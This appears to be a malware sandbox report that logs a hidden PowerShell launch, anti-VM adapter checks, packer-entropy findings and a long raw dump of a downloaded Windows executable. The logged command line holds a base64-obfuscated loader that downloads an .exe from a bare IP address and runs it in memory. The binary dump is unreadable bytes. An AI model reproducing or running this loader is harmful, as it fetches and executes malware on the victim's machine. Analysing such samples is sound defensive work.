CreateProcessInternalW March 3, 2025, 2:42 p.m.	thread_identifier: 2832 thread_handle: 0x0000000000000068 process_identifier: 2828 current_directory: C:\Users\test22\AppData\Local\Temp\IXP000.TMP filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: powershell -WindowStyle Hidden -ep bypass -nop -Command "& {Invoke-Expression ([System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHdjPU5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQKJHdjLkhlYWRlcnMuQWRkKCdVc2VyLUFnZW50JywnTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIENocm9tZS85MC4wLjQ0MzAuNzIgU2FmYXJpLzUzNy4zNicpCiRieXRlcz0kd2MuRG93bmxvYWREYXRhKCdodHRwOi8vMjMuMjcuNDYuNjAvYTAwMDEvdGcwMTk4NTQ2Mi5leGUnKQokYXNzZW09W1JlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRieXRlcykKJGFzc2VtLkVudHJ5UG9pbnQuSW52b2tlKCRudWxsLCRudWxsKQ==')))}" filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000070	1	1	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses March 3, 2025, 2:43 p.m.	flags: 15 family: 0		111	0

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x0001a000', u'virtual_address': u'0x0000f000', u'entropy': 7.039918104525348, u'name': u'.rsrc', u'virtual_size': u'0x000194ea'}

entropy

7.03991810453

description

A section with a high entropy has been found

entropy

0.65

description

Overall entropy of this PE file is high

URL downloaded by powershell script (8 events)

Data received	HTTP/1.1 200 OK Date: Mon, 03 Mar 2025 05:49:24 GMT Server: Apache/2.4.58 (Ubuntu) Last-Modified: Wed, 26 Feb 2025 12:45:21 GMT ETag: "174a00-62f0af24b2372" Accept-Ranges: bytes Content-Length: 1526272 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELa¿gàhàÞ @ 8`K öÜ H.textäf h `.rsrcöÜ Þj@@.relocH@BÀHTWH6æø(0¸ þ8þE9d8 \|( } ~{8:½ÿÿÿ& 8²ÿÿÿ( } ~{e9ÿÿÿ& 8ÿÿÿ\|(+ ~{69eÿÿÿ& 8Zÿÿÿ0z þ8þE+,8&( ~{4:Ïÿÿÿ& 8Äÿÿÿ(o ~{-9£ÿÿÿ& 8ÿÿÿ&~þ~0/( }}\|(+\|( 0/( }}\|(+\|( 0Â þ8þE 8($ o% ~{,:& 8þE8ÝW& ~{[9& 8þE8s# z ~{29^ÿÿÿ& 8Sÿÿÿ%Ch8&~þ~0 þ8þER+8Ms ~{j:Ïÿÿÿ& 8Äÿÿÿ} ~{O:¨ÿÿÿ& 8ÿÿÿo& þs' (+%() 9s# z&~þ~0ò þ8þE8:; ~{C:& 8þE:8s# z o- & ~{W9Äÿÿÿ& 8¹ÿÿÿÝÿÿÿ& ~{N:& 8þE8s# z ~{t:+ÿÿÿ& 8 ÿÿÿ&u8&~þ~( 0 þ8þE.48)~: ~{>9Ìÿÿÿ& 8Áÿÿÿ~rpÐ(. o/ s0 ~{h9ÿÿÿ& 8~ÿÿÿ~*j(#rép~o1 t&~þ~09}"( }}{( +\|( 0 þ8þE984(>z~&o7 ~{5:Áÿÿÿ& 8¶ÿÿÿ:Ëÿÿÿ ~{c:ÿÿÿ& 8ÿÿÿ .rÿps8 (* 0_ þ8þE?8:~(þEs9 s: & ~{\:¿ÿÿÿ& 8´ÿÿÿ&~'þ~'0 þ8þE.X,8)þ} ~{y:Æÿÿÿ& 8»ÿÿÿ& 8þE'8":Õ ~{:& 8þEèn}Ö
Data received	:Ñíÿÿ& 8Æíÿÿ~ d° ]Ü4Y ±{ÁY ¾½¼a}? (I9íÿÿ& 88íÿÿ~ ²VA b b d7a} 68`íÿÿ~ a>¸We ÁG¨a} Cþ88íÿÿ~ è_¼L vÊDa {)va}k b8íÿÿ~ µÐ> ¬Q¡Y \|È×Y &#d\a}d A8ììÿÿ~ ¨Ù"?f ÑÄæY Úa}\ Z8Æìÿÿ~ Ë bf ïFÿa}7 8 ìÿÿ~ ÁC@ b Ü0l7a}q (I:vìÿÿ& 8kìÿÿ&~þ~BSJBv4.0.30319lè#~TÌ#Strings -°#USÐ/#GUIDà/h#BlobW¢ ?JN$ BIdI0IW\sIyÍýI6DI_rI\ÂÌü &ÌNIgInÌ¦Ì· ¾ÌòINWoIÌIëIòI ù+9/W<W}³¿ IN I\|IÓIëIò&DX³kzWW®WÍWæWÿWW5CbW²CÆáøX-HawaX+Y n£ ¸ Óáóá#3="¡Qd)¡\|4¤7µ 8ÉÛ&<!ì(Cð)F<K"N/RIK"ëQó/÷^K"ëK¤K/R²é!%3÷:'¯ð¡óën,1Ô6K"ë! óK#÷/÷3ûmA6:TKwKK½KàK K& KI Kl K K² KÕ Kø KK>KaKK§KÊKíKK3KVKyKK¿KâKK(KKKnKK´K×KúKK@KcKK©KÌKïKK5KXK{KKÁKäKKKMKpKK¶KÙKüKKBKeKK«KÎKñKK7KZK}K KÃKæK K,KOKrKK¸KÛKþK!KDKgKKKÐKóKK9\KK¢KÅKèKK.KQKtKKºKÝKK#KFKiKK¯P T 5 \ G !Æ ¨!îB´!Fd'áV9(+áÁ§+ÞB+ó±¼!þµø!4µ+áV9@0áÁ§0rB¨0~±°0áV9Ä;áÁ§ <B,<±4"8#B #¢¥(#ÀªÔ#`Bà#uë4<9<<°÷P<ÑB\<Þè#üø$CB %V' %9 %å: ´%* T ¼%6 Z Ä%M aà%f Bì%~ qÆ £ Æ º ÆÒ ÆÒ Æ Æ; ¡Æ[ §Æq ±Æ Æ ·Æ§ ¼Æ¾ ÀÆÏ ÇÆÏ Òô%ë Ýd<áV9ðBáÁ§LC
Data received	¶:À¿}U$8IÁªùRË¢Ù'>ª3ZÀÐ]©ÃòªÆrÝqõ/4(¦Û¿^î=í?(ÌWhÍUÀÄÓH5:zÅ@»µ©}T2YoëÁQ°ö%¸«ñ?EIp+G<úÿr% `Ûr½S{vÉ« NêÿÚ!0ýbÎ<XmÆíªÐÍÊ4¥ªAØ_G¾]Íôuñ£_ÝIlRæ;9XÙqÇ{¼Unô"8Ú ç¦a%èÅãß;®äõ¡Ä\uõë¹Þ/ñPî&¯+éq¹3ï>zü`Ì_q«°ÈFècÏ@Az 0Zî\!}ñ·(Ê(M~ÁR×$9ºüE¬V \-?] HNNról mï^"Ýð8 íí<R#¾ þv¨.ëø@ït:U.S>¨-6¡Qñ{RÜ6vàyd[ÞÖÆjÓEÔ¯ºIW¢¹kjvÇ£Y»Ó/=z#®CF¹[ö¾W¢$;×¥uo×þSãÎA\4("S£Û=KdÀ!aJêÁ\|¢/ùßÚ®¤:ègöÊ¨Ì&åÔ1OÍmAóõuÔÝõ²µúzWHÝJü[:%X%l ³yåÈÇd/ÑûKU P/¾I½º w~÷@´z1 R]"ðõënµÇËâÐ«jû$l&k\|ãT÷??¿êâ÷«àº¸nûÕ?á¾¢16)×sS<2âôÏFÝæ©°,Cõ®æ!Q%iÓÖrÆ{¢aði XÙÏaQm½qþ/Î SIýkp¸.î^Û8öyÖÜ^ñzêrG´¯b,Óþ¹3VÅô nÊ,) mtM Ø6 }·M 8:¬ÖS)rnÑóDùÒBHbkmâ ÅxF:ûb½+·Hipô¼¥Ç`"Â:£«¨ þºÛM¤10ó×å? >` íÈ½jDÄÂ·[»©)úÖFn&zËÂ·Ò@XÞ³ÛXÿßíÁvì5ºYO¨5é¸ùR2äÉ¤äRïZØÚýÍ7»bÐ=v>7iTË ?ÁutÊ{`ÆÖÂTß07¬R¯ÖdLtÀ,FN±ýkÄ=íi,#@ð×IbÚ{[WmXjT7Àãå$ËÀ÷.(Z]©`}UÇ²ùøT/mJÑ÷î£V¦à}TR±¦Ô(°Á6{.póO-ñú6p°Í.÷Ðç:éOW+L[°Í¾RÈR* \í ÄgBWÿÎæ(.¡Z?BÍ¬ÆºÑê÷0,xdîÆçÝWûþm=¤¬±ß['¦<ý%n0 è¢ÂÃqt Ù¬ÆP¬õZdºÚðÿäÔ¤ÇìÏå¡,³óËõ,<dE± ñàOalûuÏÓ"ÕK£×syÙ«1 ®¾³«RÒO1äv[ÿ[G`Ñ¥ kîx»¬^°ÞÝ½%Iæù¼Hµä 6ÝÚøIlkÙ²:¢û´ë¾iz°ªK^'w§4Êþ=;lëáv³ Ö¸{]ðîD?¦VM-ÛE£±8³Setg¡$¸zÆã7h/×&_-æ=ûpÄ ¢È#©õ%»û¸?¯Y¾Ú&Æ-ÊOßßLú5±hñÏ5;ÛðÓÏ[¦ùçÊïË#?õîEÂÀÎü¥ó »0É3,ÐÞâ5¿52µTkA¬e¥Ò'DVÎèòí_F¸53¸>R$^ÿÜÒ(ÿ3¯WzåF{X'Ò¿ £õÍìé u22¢"$IÛ6TMl¨ÿdýûB#2Ýä¶M-år©KDlBZUÝ[-uï"D`\ú}TÏí&<c>\P¦!Rg_¢7÷ñª[ MxFÞ4OAU»Å×ªíA1qÔ«{ÏTtoò¾AÊÉ·Ç^Á¬ð¤ÏÕÛuÚ0´d©ôÏÉ\¹Æû\¼i[T°½zö<4¿HjC®ûýVUóþµÎoÎMoì&R¾ø¡wIuT¶Ø¿RpVp`8 ¥á@;Ê§û©`0UYà ².´BÓ Ùv½Ïêø[EÎôieLÛvO±±ÿ×Çe#[7ÎÏÅÕ2·ßÖ¥å¾!&,-2"ãphåÚõv9(V +-d¯ðéØ/Ò¥WPªÂVT.¥~Ù{ÑëÉ¥ì¾at¾°E_¾Û&TpdØÄ-p£#sqÐì;¿î«Í%Qà<Þï"ÌV1Þh¤p&8×Å9q)óËFúÛ´½)ÓP>¢ÀÚqÿÏbdh¡xG+Î?ÿ44Û2ÀÚøL¿q¦},ßm_©QMö wKv¥&_¼Ôª2à Ë"2{Ù þ=óÙ½ Ô}ÈBèÿl_ñ®AuøQ7Q4Aµ8Ý?Ârá>B¯JñïjÈmÜ³íÒÏÉ´¥&Ú¨äÇAÔíñªV2ÿÏsWg/B~×Î:\?pö£VÿW"\i6ÑVÊ8£Û0\|Ý¥ù×µÎ~CS(BkEå¼LÅC&TÂ-º³ÐDÀ9õ«·Ó.Î+_ý"}N¨ÆÐR_eêO)ÕÆ.kó& ò¼Õàu²!9ªãnJ~òÛ(/.Õw°BÓÑÖ¢Ì´Q@8.ÙnëåqÉQïe÷é71@59b c%Hye^ùsÂBË] ¶ÓÛ^/µ,;ÎG@gx@Ok Æ qíô»<bÄêq2^J¾ÚÆäÑë'$Ë3Ôn81äsÚ)÷Ïw5Ë·`ár7þ}ïDØïé7"³7áäÿ É©~CÁ5<Þ©Þoô«v`Üq©ì1ÀÁ0BS"$ú}jAU)¤@ÙñÖÂ´6uÙZ_R¦ÍÉê³¿Sª{åôöqñåäMTxbúÇÍ4DãÌt_=9¥»ýâENÂw/ £ÃÌ5¿å>^@2~÷sqoåý~ùR8ýÕos7§ ÝhñiÇå%îw¼µU\|í1uÍj¶£&ºTûÈ¼b!âGBÖ jÜúÌ©ú"a')t{üì'1±-Íç$¾Ï(Dþ'¥òKb¸bè6izþ&l ÌéUT¹"^W;æ_²»Î©mÝ¬í»äóÏ±·6Ã·2ÎZ#×ovZ'9ÞÆYCÔRùº'ºÌ§Oýêi»>Õ(ü o_×J¼éñÑFJÄc`ßð_5¼D+@×ÏC Û'GÛieÁ¶ÆÉS½¡DYh?åX¹ìCDEz¨òjQw!6ñnònvªñtÆ§ âÎáB©¬¶Ä·cìÎíxEÞcWWT½cÝ}{`l4º"çÑvr±OÄãïo#Ö]xö¢q'òøÄ7ây!uÍ>;À+Â?6¹ºXÚ/ìJÞý¬C$rWÒ¿Wæ3'Oó·¼Kà¯p2[ØÙHwÏ£eshòëp
Data received	v}>AF1\|vi¾×À<J¨½z%HÌ\| 8ÐÓbPû\|S'²T»ÉnçbKßò:òý($êöS8j¨^i¯ÝTâ}owäÛDÐ!lÐKþm1¶sËvóüØÄüÚ×¼ z_3ÐÝ9Ø +ãöÝÙO'WæçÌþæïÈì¨Kê\|¸ï ÄúYÉ äQÌ 7M!H(»YO%¸¸à¯ 1²$Ü¢yDkrQø©(^=JÀã±N´I3l µS\|66Öm\9Æ°66.CìSxèðWÂ±w àÌt» ß«sZ/KÜÁùdåÔSìì 3eñIÇlwãZ¿Ó,.í~²UX:Z¿÷0t¦r,£l{Ã¹óhBûj#×T:)ä%üiDF9¹êDåPµ>T«l¹¬=ÝÔÂèÏ1ñ·ÞëFxÆ°ð8'_`¢ÎuDýG`C-ÝátZ±Ú¢·ñã3KÅ ÚÅÿ &>¸Ýãúæ°ê×Mà>rs¶ãZ7lËg°²}p4åªU·gTülÙ àÖ¢Þâ[jÔªFÉ5&e!:ø<üV'Lä"Äv[J¹+´¡UZ3ïy&¸µß~ÃÜéù¸³31&~Æùe¶TL@pdñÙ_@ ÁR[{ºBÉ`t ÖJV³ñY-Ö§IVKGºÏë'#N:eÇR÷{ªµØúÆZ.÷ Ã¹AZ¿Tæ§Jö¹U¹£#$¤7í'áGn±¨è±kðH[%â[²êh«©¼Êw44}\|ø~¶/Ã¹ym¹î´!¼4Q¢ß0«&½k²«X~ó1 %ª`àË.Ï»±^Úkõÿ¯/We·ÔÖ>«f»ÈÃIÄ-¾²ÕÏÃ[øé¾Lû·úÜ7"º®ñòZ%² ?GlÚÜlóKÍy^ ±öÒÖfyX¥_`,i/Ôëwkój¸ûjSüCñ%Ùëd³ÿ¡¯]ÙÝºÝEZmú$¬6Å5\|CÕgZ,ÁðÒØn½V¦vÕ4uÐVþOwýP9äË±÷æÁË"¿N© ÙÅy¦vUÝCÇ0pØÕ}N"t«{47âu%¥³kWíÂçßõ¤ìàý^\Ert2'#4gr(E¾¾³kqG!78¾Ö"wh5ñãÊ6\|wÖ7&Z§¸úÐ.æh¼U0?ïÎ}£{ð+ñg?ÚbZûEÆhH:èhè½ ·°fBÎÿh#¯äR5@Ñ";ûà!òèëBèªa_n»hDXü» ßÅö¨V\Ä¡øOì~ª8a¶Á#¤Å# =ÖK Ô§l[e}öûiÚ¬6··ÍÜkÛó4@~oð/úk¯£&¯¤½B:¨FA¹eUrmhñ0)þÉ4CxÃä»íJíÖ4B:9 yìÄEÿëÿUùc¼.¨wò)#ðPöaJµÿíßt0iÃ_½³V¨6d1yë·ÎùF=Çz@ú{ñ&%ÿIÌ¥ÙI\ ´§Y-f¡Bf>¾j\¸DEl %êêªÐÌx]«$r7¤KúEúKãö÷¦ó(pïäÙi{ÏE!ÄýíÆúNÀµÌí?ÎOÙX(W×+Þ'T+<;P!¡1³£öÉaLndIô\ÚÝ¶Ô¶åt/ìS¯eé)üñÁHRâoì´0¹jôÒüà¬É(B½ëQB¾JËX3dgÚô^éøù¼.?F&¸´«Ð´ØCÅtPc~`qÏ5´°Îùxò~Î¥Á«ëÉö\|Y~ðõGYÑg6üì!tøëzÚÞY®Èö£7;<hõ0ÁKYçàu¥.¬½Åj´]<aõ&4ï{õ@ yW?OäÁ·ô.r%ºº¯¯º#sár÷Ób,rIÁ@\ö¨¦1§Íz1_ÃjWecÂ Ð("²'§O¬0áéx³õª)ÛÃÆ-¥%zßkURèÃväÈ§ílb¾»¾ByñWE)ëOûV15Ì?}&ñÙvj¸)«·ÜÙÎ}[u(ö¥N>ÅÒËîaæ\É (ËÌ®e<ºã¯Õ,¿áåßcÒWù¬}ëDîEÈ}0í0)° Ï ¿Zë^34¶pßU¨P°ñ,qãæÐß¤ÃÙ_©kºªl)3¢w°&ým}DK¨°~Wa'íÎ©þa#õn^ØêuýYwµÌFó.êmbòÌôÉzà{Ú;pZ+ZÉ~ã4u«nb vnNhõå4À»ôFëª§r ñ3ù½·§åéHD69Q°$õv¼i]c9XSÆ]Q"mÂ$¢ÖTþ.ÄæUT 9 ¨)å¦âÞþQ\ è3E³Bg<<UûârZfQ>)oaÏ¦ñQTçBgIØ ×ÞõIáa°þ+×²"!ø,HíÖ×\|VjÕRH«Øe0âÖýg§ÁÓÙ_a^4rzê¿qï» ÑtÉáfµD¨\Xry»vãàsãÈqëÇíL2ëÇúÌFêRÏ¦ÏÍÊN¶ò·h¢MÑr®ß«)Ý}á$Ä.ZÆ¸kbìîø÷B)¢¿&Ödã8´yu³I=Àf!"#mVKödKhÌÖá"QLóJº'§}¢X7c1ÒxÉaÅ8ñi>Veg`yÃi÷+§ó$(N#×QC«Î¶cï¤gþîñòv5s`]«ñx á:¸¢Û@B³¶À+4sèLºØôïeWÔØÈ6ï«}Åe¢EjçåzÜÝõ+X:À±XXv-®ÄïzVÏk·zp´ÞTÉI\|ð¤Ôæµç®¯Úªx?¹ÕeåW¥¤ð\|Gx!Ñ^tòºç&]éÄÚØ¶?Í+õnp~0zvb½Í-T\ÌÈhÆ:'Úö\|açbùl¸Ý÷±+VM ÎÞN $ BÍöÔx»ëV´ßú#Ifps`±ó^QvõÓ?r·xÌN; RT%D6i´t"ë¸Hµ?¨i¢!¾?ªvÃô~[/q´@H®n»¬¸fäÍ@Ho³\%×q$-]µïd+ÙHå'7&ÝS~ûk¡×ÈO:1/ç2ý>Fì¤§hÝ÷r·õö ðùó=9G ¤ªôËËô.l¯è!GmZe @¯ØC@x~Y¨q¬éx©·HÚ4{Q9à2Y×Q&l'©³Ûß¦ W5$Â>ñï@ß4½´îEà¥ÞXè{ÛÁwå#DUÅ¯µÍnãÏ´n³Hí ìêVævÙ i\ÃçôÜð
Data received	v+æfÔ\G ]LOX;åe,Ï\|¿Æ?Õ`4ÖÆü¶M<¥îä1ÉSXwÙ1À7týáÐ G&¦ÿÆ&ÜiuO mð`ö´c3³Zú~&ÛHËÉÎ5ftÖuÀ` \|Ê #AËì%¾0õÃó"ÿÅY[Ýõ¨d«X r-9Â¥âSx Â!¬EÍ)9Vd¶Aº«ø'A&&ØÐÙbJêä¿hcç<¸¸%kxæø+=äøSf×.O©;A÷áýègF»æþÒ±ãÌ·Gc8W½Ô2,â}³k§ Ãî7¯EØS¹é$Í²¿_ÎÝ#ò:cX¸<õÈÖÙ{½)¤±Íâw¿©öëÉÒÈEVú5±íÌJnÏåÅg´¬XÎgþ/zõxìÿ(Îó¶,-¸ Ë×äyu¼æH$1Ír(Å¤TNÏÓ8T<irXÃÃÈiâac7~4jçgRÙÞ0JfBS?0¹9©ý¡Þ{t½®ÜP7ªmïFÅpnjD&¶¼5fÒ®=Ìuù°Ð`ÁVçüM ·0 ¾¨gdUûýñçÅ±ç«ô³)ñ¸eq kyîÜ².¨ÚäU!X!¬ËÆho,<Àr-bÀ;òÔÆ²£ªÌõÞc`É;À/Ý¼Ú:ô³²$¬.o¬Jåñ ¤gÒÖà0ükä"cE 4¨u7(\|\|z`éÔ`×XÕ«ah<e)í(_[<@^äB¤ñÆ·O¤¯tÉ\|b×ßó5È\¬A°sè£8k´Ax Æ¡bwHÎg@MïIÔ¿Zß}0Ú8X?ëy<¥"õÅêë)ýMÍmnüÌå±ùÙávà2»êºJ·2PeÅñ4`·²Á¦x$b²<4Hé;eÏáÛò¹òü°Ë=«QZ§@²)$ïûcáWu%J¶êTôEáx,Üô#¾¸kÉ»9 ï3ÍXá«Ãæ6åÐß¼ÆÛ<hI¢¢sHü¼3=NñEÏÜcíå7ëÆå5Ù\|ûhçâ>f¨©iâ%Ø->ÅÅ¶ÞJ¬üGF×K\|æ`TdÌK`¢à@£ËêèÈ`wë,h¾Ü²Ìh¤at§u1u¦2íËV):§"»ÿÖ3ìAªK%ö$¯ä+ÄTÏiðÐÚE}[ñ2ãþ¹Gx{Ù~¤ÙuåyÒTÑ?)É©ö¡5H¹2azB,è¬a·:yµ¢c(w×7;vô01&çóÒZÇê¨áKöæ "òî=sT+ì¿ùñKXýq1ÇæáDcÒ`ÍEõ{ZnÃÝÅä8ÛEÅøo÷´ã¨ªMá« ë_Ç(Ùí£>ìb°µUC)u+K>oë 70ãZhy#¼ï¼pk_¢Îà>DCKrÞÞú2þw`[)ñ±ÊNö¼\W[4Gñ5öT%ÁSþøóª[ÄóGmºVr[ÒÌ_H\cC+gA:}¯ËSóÙkÍ\|"'ABâì9ÛMf-¿ñáZ£mØïMáR¸èýbÆóy®ü9.Ðöò¸ ` ¹éíõàÔu{Gï2ã\|à}nØöj{~ÔÈÂ}âgÏýÁÕ¥a$Qÿ:4Ù7?[P¨[ÿ@7Ô«² q;µåî'ÍcÕð=cÛ/3ÎcdS2]y7OJÌ§dÙF<i£CJÉäa91Â±ÜP\>&Q¤ø Z"¯eÛüÖ%Þ}±äÙ¢8Coöù3 Ý^¢ghÙHÆÀPÕ\ì¡Íþµ1Íñ~YÏbD}ø M)]¦÷ö7$ ï) ¾É!.°bp@¬H Á¹Æ#D½gq´ôwÈUX¥ñûs,>És%Õ7D{¨ìÆ -¯i;nK5îK¡;WâÇñí~h{×ð^ÌþHC;F¤Iý¸B=h19ßÆL5vã@z!mÐ~j)9Vf];u°»Ty$ U¹E%ê¦ôÝ§År`Å#:ë§hÆïI#vÉw<ÄÅ´Í VØ{ññ©_¯»[¤Ù6½k^íRTùÛC%/ø û°oÔ"fænµT~=ùð±jØvp¶ÒÑ[ZÙJ½¬»ÝÖãIÃ<oè@¶ð_þõØñM¨f.¿oÊÌ`2VOþ ³a ÛþÕßE9)®òh5 »J¸÷²R$~kV §Õl¤FMçæ+O{½·bòÐu1Éñ 38½îcvÖ%îÒ8+§ë eÉQÏäÃ¤Ô6,\ðUäw½¤ùç\TO}®Ý ]#:%áÇs¿ £ÈeòÌ£',x8ÂºC½}¿ðwÜý1áe´.²oí ¶!E\Yñ.½#ú._ë²ò}Dx»]Vü%çZ!÷sÜ6¿y£ª ÚÞm¿F:Ù«[4å~$\|F{ÎýMEf&b¥¬à) ÌÝû{wdpXÛùgÞáAèý6Wj&¿õÓ·¥r.%à»P9÷Ü.¦Ééí X^ñÓòùFxq¬+¹ÄGs¨}7ÑÒ±Ì5BOjv«Ú%Àéàa:v¤÷¨]V>:áEÊ¸Ö&ëÖ°qÇòÇ£¿þ¤\|þ÷'S2×i¨PÝ_c§dóÜJntd¾wy(}¦!4\jqB¼D=i¢¯JÎAá¢ÎØvm=¾æaéNÐ9$hõ¹´;P.FN)0Ø'â´\|}³h-ÆBR2öiiü÷)wq®UÎ_Q½\|àypÐi¿ãxtäÀþ¡D!ÙDdAX[©M0öGN'ÞK õÒ¶ #~×Ù·3"\ê¥KgÕ×^qZ`¬ÙU·Àî±ÌôÚÈe3èøy¦çåHø{o:ñ8Qç=fstiÏoÚ_]ôk&¶gFQ&jZ¨UìaV·y÷®'Ðó½ÅÜ!Çq³/åhÚK_giüK_HÞ!9Ö\Xí§xÎs&åýóÀª 6AdíÞ¨pA®¥>ãrj£Ûö;Or0Våi½uê©±©4L½Ð@Bá©×º43ñÔéÊæí¨3ZC¹ ä~kKÓVÙÂ¢1¬¸Å¤Ãòq¥·ÎtÅÑ¡DÞ¦E7¨mºÂíw1Ñ9ûaÍ@3÷rv¬ÛðÎ#Aóz¡½²drús¸l,ÌÙ/%íæ¨ýÒÜñÏÓ½ÅOhå¤`× ÞìÐ«£DÒ~`8a+þM9ÙP\|ìQa7ÙÚêæÎ;=aÇÁ<µxkâÿ73çÎÞä-6EÓ`ÉPgr¢.è Ò 3ûÀpÏLLï×yY'©' äüÒ"Ò,ykíWkèÔ,uÊãÃ4ô9b,<fhö·Pt³ÍzÀ¸Ueýf ák©Ï½X»H¼L(õ¿£p;éaEù
Data received	1n\úB&<Èè©æÈÞS¾ ªè 7»BH{RÿÛ¼mzubxè ÓÝ3 â¸°ÌËxeÒûð8È"0{µéÊ4²aN\|i-Ð³3G¹Ù½´ÕÌ77.ÚÌ©UwEzSQâéDOty³ÍcÅdvÌ?îD²xà¤·ËåTZT»ÅxVUHPw?5!¾O¿¼ÖØæÏBËn}P'Q":ßûh!\?óûHå#P 4çòþçÔmn´sbíãæòg øFR`½[³Ä¤Ù¸~ìQjÒ³»³ºUéÜyîgVÜÈnvßÊ¡h¢u$oæe'ë³W¸©^»rÚ®÷#8i-å ¯\½_ÒøÛ o:Ò}0@·f4Úc¶ï#4&ÙOØáÖöäÔ²+ls\|º2v¬NÌ)U»fã4Çiö`\|§!¨¶/íO5xÀ:R§J\|~£ÅK">#Ý¥N735ÒWv,cO24Î/áïDF\|´ÿõGìðÜ&ØJÊïë0;ó¸y%×SÙ à¢ËFÍJ¹§Îmgði?¸¡N¤´`SÊr:«´è]9ÂKr y¿ú!N^})yd WMº¹~Fâ,qÇ"pUëw ¤½åÃÁ},Fh2u Þ<Yq0°ùÊïX¨2E¯Q,Ç¶&rsjÂrËûqOÜè²òn®a×ZÓ@dqBªb·Õl9H(¾1^°¸ÖLàÜnü_ºz°îñIh©VÛ7M©àR/#w«S èsåÎ$¾TOiáÃLz Î§Æårïß s0"ÀëØ»3ò^N ©è´{3ýUPCLJGÌm,FP®r5à3³M"®`òWß×~4 Qý;BÕ~@ÈýÛ/É# En^uà9aÓ²d)G×Ø¼CÕË94¿Y#3æ²^»Ç¡_iUWX:>ß¦ty æÌ@ã,fâR`Ô>ïÅh alµò¿Ã Ûvû$ ¸jT½¿¿þèº-WöÒõMß f¾û¢:²Õ¬ì/Í0»Ez7H¢³O±Êûàò2ô1:MÎÙT»êµWY{ QÚ$ò8 xPÄú!,,§O"¤Áíâï!¯ªJÞ¦Ã¥ûÎÂ?ó?/Ã§$h@YñÙt1X0geË~ádSÃ;mC´-@£Ý½%¥Ê=`Þ¼=$óÀK)~ßX{.I$bbHXù¿¢åÙ<«ø^õyâNãÏ®¡fõD®aÑº;0¨ý[Ýx¾¥wbæZ¥b£5ÒØó9óãï&´_£ì%/©nQ5óVCêsß®®°ûÏwù'ÚPÖ,+ÒÔÖØD\ÄAÝ\"rå'/Â¸X[Ü®Õ¹?¤`]$mIúö'èsûîHxy)T©Ý±¡ÿä³´?×sÌ» -"Ó(²Ið¤ifX°A{CÎásod©4àÂ²¿¬.Ðêaa ÓyUûGQæýÌÚÆ8ßØ0Ûyk\|A¼oÐhùÀ%iÕðË%¡<j¹{ª5)ÝA¤Cr¥·8f?Ç;ãnÎÙJe ½0j<Éïa¹Ø¨ÇÆ3¼ëØ³R¹ÉKeÒN´C8H¯ÕD¼ê'ª«±5£&gÏ=ü£¨A!U/·hñ"`¾Dm:½oÞq¶ùy â¨vC°%ÈEÍBx×ýÊÔÏK¶5ì=oà6@ýÀ"f0êú¸¤®½íTq¯r¥kÌ«ØÇhzð43QEÜ¯T¯ÜÚoøÍñÏ¶}³Ú%ü¸1 +ªò¾t0 Ð.ÆÛw0Ðö©0j{Þ«®÷-×^ï\|HCó_D=î[KDr0<dEPcb¤]üòxRZS¯Åf6Zº}¤Áå.¸ü\|þÍ)Ð°ÅúØ×¶k"+ö6k½´ËÇ®vhAÂÃÖÅ?får¼rØ!rïôbptRÆõÚ?ác+£âcBA6-"ºgôuP`&+GîqöØÑ(Q#fqëÊsd9à=ht6f<\|sÃ§Å> ÄqÄDªÇPFçðÞB!F oüH´~ÆÁ#×d«åÒ«aÀiÃ»z^IDºî#¬Åæ÷>[®ûØ()ñcmËÌäP w^øáýyKîÕéaÛ{6ñÓ«þ°oòR)o¥ìfà³%ÔÊÍÛæË:§¨¸}ñ3IYÊé!éËÜ0giiåB¹ñJUò_Æ?Ïz1±%!¡ãã×Xaò^Õ9^í±mà¯Üµ7ãâàHÓrµ«'Õ`ü½$ñ b}TPA{êDÕcTíáÇ×:Coã¬#TVÍY]7ñÓÊ-P¿+~WoÛSÎOM¬sÆ+Gw®£í&ä;ñÁÆÉÂÿ=6Þ½+Gùév àâÿuý©[¦ÚmbµïRèè>¤u+ÒjüÔP3âµË2ovëqY¼Ë`rÖ£©SµVoÞû.¡¢Ð ÕéÌx Y.5¿½O'ÃË[~RÆøÅ½ZÀÜyÌªpFyH£Sò¦º½Ó/æ·È+Pç9> µJ-È=21^ñÎ`s»®# fÐÀX"_¥ÕylV Meo®BçEl²2Do¸â±§Aß§õµ°s'ÅRÈÍ4ÄÜòÅãØCE%¦ÙúP,âIy)J4hïÀDAÆÂû8ØtÅ-×TEvDD[;Ç U9Ë³måO z=_®ZØ´ÃùÏK½áÌûø£5z¨ gÁÞ1Rý±-ä¥AJ-¼j£c¹CÈV_áaLsääÌ!:ÈÊºÉ>nzùÜfa¸³©ÐÃ×ÓéîY!¦Bå1»R,ÝÃº.f+î¶;¬Ý±SiAâ¯GJ¡f¡È÷íÊoK#;È0´9µ'"á(ÈRJúõ[lLNu¾!C%" ÷4tº,cêEäp½"Â¦±0´Õ¯U¿u¹ôý/ÆúÀäqéÑ2¼Ãå5QÝ!£´êËÎÞÆ²;í$U0¥ßeSA.6BÁ(?âs«°µø8½»~ì´Qó<ËâGÊ! ÛL\|àó"kX£TðNÐ«ÅÄíC²¶ú£µ2z4.{å¥7ñ%ÀóH=E;íROM.d§Ò¾j¤"[èÐùÞ¤ÙnZÈUwhKéHýûFÅ¿UÂSeP±hO´Hÿ<Ø÷¾³U²àÂ+H]$0ó.¥Õ-+ÿÅ¦3J¦¼#Ä3×~'<ïéÅ-xSÕß-"&>!i4²)ÄÑ[LõÂEg·ûY±u#&~ R¹LS:ñeÇ+±f¶²_é]Å¥XÃU¶Ñ6PæîF 